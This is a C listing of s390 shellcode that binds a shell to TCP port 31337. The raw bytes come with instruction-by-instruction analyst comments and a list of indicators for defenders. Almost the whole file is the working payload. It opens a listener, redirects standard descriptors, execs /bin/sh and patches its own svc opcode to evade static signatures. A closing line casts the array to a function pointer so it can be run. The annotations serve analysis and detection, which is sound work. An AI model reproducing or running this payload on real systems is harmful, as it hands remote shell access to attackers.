1 /*----------------------------------------------------------------------*/
2 /* s390 port-binding shellcode; the byte string contains no 0x0a (the svc opcode), which is patched in at run time */
3 /* code by jcyberpunk@thehackerschoice.com */
4 /*----------------------------------------------------------------------*/
/*
 * Analyst walkthrough of the byte string below (the declaration that
 * introduces the initializer is not part of this listing).
 *
 * Observable behaviour, as encoded by the instructions:
 *   1. svc 102 sub-call 1 with args {2, 1, 0}
 *   2. svc 102 sub-call 2 with a 16-byte address record {family 2, port 31337, addr 0}
 *   3. svc 102 sub-call 4 with backlog 1
 *   4. svc 102 sub-call 5
 *   5. svc 63 three times with %r3 = 2, 1, 0
 *   6. svc 11 on the string "/bin/sh"
 * NOTE(review): 102/63/11 match socketcall/dup2/execve in the Linux s390
 * syscall table, and sub-calls 1/2/4/5 match socket/bind/listen/accept;
 * the page does not name the target OS, so confirm before relying on it.
 *
 * Points a defender can key on:
 *   - a new TCP listener on port 31337 on all addresses (addr word is 0);
 *   - the payload patches its own bytes (stc to 212/213(%r1)), so it only
 *     runs from memory that is writable and executable at the same time;
 *   - the stub is stored as 0x0b 0x66 and becomes 0x0a 0x66 only at run time,
 *     so a static match on the svc opcode will not see it;
 *   - the literal "/bin/sh" followed by a '\' placeholder byte.
 *
 * Every small constant is formed as (immediate - 1100) via %r10, presumably
 * to keep NUL bytes out of the encoded immediates.
 * Scratch layout: 120(%r15) holds the address record, 128(%r15) holds the
 * argument array handed to svc 102 through %r3.
 */
6 "\x0d\x10" /* basr %r1,%r0 ; %r1 = address of the next instruction (position anchor) */
7 "\x41\x90\x10\xd4" /* la %r9,212(%r1) ; %r9 = address of the svc stub near the end */
8 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
9 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 ; bias subtracted from every constant below */
10 "\x1a\x6a" /* ar %r6,%r10 ; %r6 = 10 = 0x0a */
11 "\x42\x60\x10\xd4" /* stc %r6,212(%r1) ; patch stub opcode byte 0x0b -> 0x0a (svc) */
/* address record at 120(%r15): halfword 2, halfword 31337, word 0 */
12 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
13 "\x1a\x2a" /* ar %r2,%r10 ; %r2 = 2 */
14 "\x40\x20\xf0\x78" /* sth %r2,120(%r15) ; family field = 2 */
15 "\xa7\x38\x7a\x69" /* lhi %r3,31337 */
16 "\x40\x30\xf0\x7a" /* sth %r3,122(%r15) ; port field = 31337 (0x7a69) */
17 "\x17\x44" /* xr %r4,%r4 ; %r4 = 0 */
18 "\x50\x40\xf0\x7c" /* st %r4,124(%r15) ; address field = 0 */
/* first svc 102: sub-call 1 with args {2, 1, 0} */
19 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
20 "\x1a\x3a" /* ar %r3,%r10 ; %r3 = 1 */
21 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) ; args = {2, 1, 0} */
22 "\xa7\x28\x04\x4d" /* lhi %r2,1101 */
23 "\x1a\x2a" /* ar %r2,%r10 ; %r2 = 1 (sub-call number) */
24 "\x41\x30\xf0\x80" /* la %r3,128(%r15) ; %r3 = &args */
25 "\x0d\xe9" /* basr %r14,%r9 ; call the svc stub */
26 "\x18\x72" /* lr %r7,%r2 ; keep the returned value in %r7 */
/* second svc 102: sub-call 2 with args {%r7, &record, 16} */
27 "\x41\x30\xf0\x78" /* la %r3,120(%r15) ; %r3 = &record */
28 "\xa7\x88\x04\x5c" /* lhi %r8,1116 */
29 "\x1a\x8a" /* ar %r8,%r10 ; %r8 = 16 (record length) */
30 "\x18\x48" /* lr %r4,%r8 */
31 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) ; args = {%r7 value, &record, 16} */
32 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
33 "\x1a\x2a" /* ar %r2,%r10 ; %r2 = 2 (sub-call number) */
34 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
35 "\x0d\xe9" /* basr %r14,%r9 */
/* third svc 102: sub-call 4 with args {%r7, 1} */
36 "\x18\x27" /* lr %r2,%r7 */
37 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
38 "\x1a\x3a" /* ar %r3,%r10 ; %r3 = 1 */
39 "\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) ; args = {%r7, 1} */
40 "\xa7\x28\x04\x50" /* lhi %r2,1104 */
41 "\x1a\x2a" /* ar %r2,%r10 ; %r2 = 4 (sub-call number) */
42 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
43 "\x0d\xe9" /* basr %r14,%r9 */
/* fourth svc 102: sub-call 5 with args {%r7, &record, 16} */
44 "\x18\x27" /* lr %r2,%r7 */
45 "\x41\x30\xf0\x78" /* la %r3,120(%r15) */
46 "\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) ; args[0..1] = {%r7, &record} */
47 "\x50\x80\xf0\x88" /* st %r8,136(%r15) ; args[2] = 16 */
48 "\xa7\x28\x04\x51" /* lhi %r2,1105 */
49 "\x1a\x2a" /* ar %r2,%r10 ; %r2 = 5 (sub-call number) */
50 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
51 "\x0d\xe9" /* basr %r14,%r9 */
/* retarget the stub to svc 63 and call it with %r3 = 2, 1, 0;
 * %r2 is whatever the previous svc returned, nothing reloads it here */
52 "\xa7\x68\x04\x8b" /* lhi %r6,1163 */
53 "\x1a\x6a" /* ar %r6,%r10 ; %r6 = 63 */
54 "\x42\x60\x10\xd5" /* stc %r6,213(%r1) ; stub's svc number byte = 63 */
55 "\xa7\x38\x04\x4e" /* lhi %r3,1102 */
56 "\x1a\x3a" /* ar %r3,%r10 ; %r3 = 2 */
57 "\x0d\xe9" /* basr %r14,%r9 */
58 "\xa7\x3a\xff\xff" /* ahi %r3,-1 ; %r3 = 1 */
59 "\x0d\xe9" /* basr %r14,%r9 */
60 "\xa7\x3a\xff\xff" /* ahi %r3,-1 ; %r3 = 0 */
61 "\x0d\xe9" /* basr %r14,%r9 */
/* retarget the stub to svc 11 and hand it the path string;
 * the stores at 224/228(%r1) land just past the last byte listed here */
62 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
63 "\x1a\x6a" /* ar %r6,%r10 ; %r6 = 11 */
64 "\x42\x60\x10\xd5" /* stc %r6,213(%r1) ; stub's svc number byte = 11 */
65 "\x41\x20\x10\xd8" /* la %r2,216(%r1) ; %r2 = address of the "/bin/sh" bytes */
66 "\x50\x20\x10\xe0" /* st %r2,224(%r1) ; pointer slot 0 = path */
67 "\x41\x30\x10\xe0" /* la %r3,224(%r1) ; %r3 = address of the pointer slots */
68 "\x17\x44" /* xr %r4,%r4 ; %r4 = 0 */
69 "\x42\x40\x10\xdf" /* stc %r4,223(%r1) ; replace the trailing '\' with a NUL terminator */
70 "\x50\x40\x10\xe4" /* st %r4,228(%r1) ; pointer slot 1 = 0 */
71 "\x41\x40\x10\xe4" /* la %r4,228(%r1) ; %r4 = address of the zero word */
72 "\x0d\xe9" /* basr %r14,%r9 */
/* svc stub reached through %r9; both bytes are rewritten at run time */
73 "\x0b\x66" /* svc 102 <--- after modification (stored as 0x0b 0x66) */
74 "\x07\xfe" /* br %r14 ; return to the caller of the stub */
75 "\x2f\x62\x69\x6e" /* /bin */
76 "\x2f\x73\x68\x5c"; /* /sh\ ; '\' is a placeholder overwritten with NUL above */
/* z is a function pointer initialised to the address of the shellcode array.
 * Calling through it runs the bytes in place; because the payload stores into
 * its own byte range, the array must sit in memory that is both writable and
 * executable, so a platform enforcing non-executable data would presumably
 * fault on the call. NOTE(review): the enclosing function is not visible in
 * this listing. */
80 void (*z)()=(void*)shellcode;